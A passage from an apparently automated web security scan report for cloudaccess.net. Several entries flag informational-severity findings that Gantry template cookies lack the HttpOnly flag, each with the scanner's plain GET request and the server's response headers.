gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /flipphoto-pro.html HTTP/1.1
Host: www.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; 5a3e568434cf5e68c5f222754be27ef3=tbtnb9eq9lvbh56i28r6tshfq3; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.1.10.1295877160; gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:52:47 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
Last-Modified: Thu, 09 Dec 2010 05:19:43 GMT
Expires: Mon, 24 Jan 2011 14:07:47 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 29813

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<b
...[SNIP]...

14.701. http://www.cloudaccess.net/forum.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cloudaccess.net
Path:	/forum.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:47 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forum.html HTTP/1.1
Host: www.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; 5a3e568434cf5e68c5f222754be27ef3=tbtnb9eq9lvbh56i28r6tshfq3; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.1.10.1295877160; gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:52:47 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:47 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 13:52:48 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 36895

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<b
...[SNIP]...

14.702. http://www.cloudaccess.net/investor-relations.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cloudaccess.net
Path:	/investor-relations.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:54 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:55 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:55 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:55 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:55 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:55 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:55 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /investor-relations.html HTTP/1.1
Host: www.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; 5a3e568434cf5e68c5f222754be27ef3=tbtnb9eq9lvbh56i28r6tshfq3; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.1.10.1295877160; gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:52:55 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:54 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:55 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:55 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:55 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:55 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:55 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:55 GMT; path=/
Last-Modified: Fri, 27 Aug 2010 04:46:33 GMT
Expires: Mon, 24 Jan 2011 14:07:55 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 28654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<b
...[SNIP]...

14.703. http://www.cloudaccess.net/joomla-developer-tools.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cloudaccess.net
Path:	/joomla-developer-tools.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:46 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /joomla-developer-tools.html HTTP/1.1
Host: www.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; 5a3e568434cf5e68c5f222754be27ef3=tbtnb9eq9lvbh56i28r6tshfq3; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.1.10.1295877160; gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:52:46 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
Last-Modified: Mon, 24 Jan 2011 19:42:54 GMT
Expires: Mon, 24 Jan 2011 14:07:47 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 28745

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<b
...[SNIP]...

14.704. http://www.cloudaccess.net/joomla-features-tour.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cloudaccess.net
Path:	/joomla-features-tour.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:45 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /joomla-features-tour.html HTTP/1.1
Host: www.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; 5a3e568434cf5e68c5f222754be27ef3=tbtnb9eq9lvbh56i28r6tshfq3; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.1.10.1295877160; gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:52:46 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:45 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
Last-Modified: Wed, 08 Sep 2010 20:18:30 GMT
Expires: Mon, 24 Jan 2011 14:07:46 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 28291

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<b
...[SNIP]...

14.705. http://www.cloudaccess.net/joomla-service-and-support.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cloudaccess.net
Path:	/joomla-service-and-support.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:45 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /joomla-service-and-support.html HTTP/1.1
Host: www.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; 5a3e568434cf5e68c5f222754be27ef3=tbtnb9eq9lvbh56i28r6tshfq3; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.1.10.1295877160; gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:52:46 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:45 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
Last-Modified: Wed, 29 Sep 2010 20:53:43 GMT
Expires: Mon, 24 Jan 2011 14:07:46 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 28983

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<b
...[SNIP]...

14.706. http://www.cloudaccess.net/joomla-support-and-hosting-support.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cloudaccess.net
Path:	/joomla-support-and-hosting-support.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:45 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /joomla-support-and-hosting-support.html HTTP/1.1
Host: www.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; 5a3e568434cf5e68c5f222754be27ef3=tbtnb9eq9lvbh56i28r6tshfq3; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.1.10.1295877160; gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:52:46 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:45 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
Last-Modified: Wed, 29 Sep 2010 20:40:16 GMT
Expires: Mon, 24 Jan 2011 14:07:47 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 27924

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<b
...[SNIP]...

14.707. http://www.cloudaccess.net/joomla-templates-and-themes.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cloudaccess.net
Path:	/joomla-templates-and-themes.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:45 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /joomla-templates-and-themes.html HTTP/1.1
Host: www.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
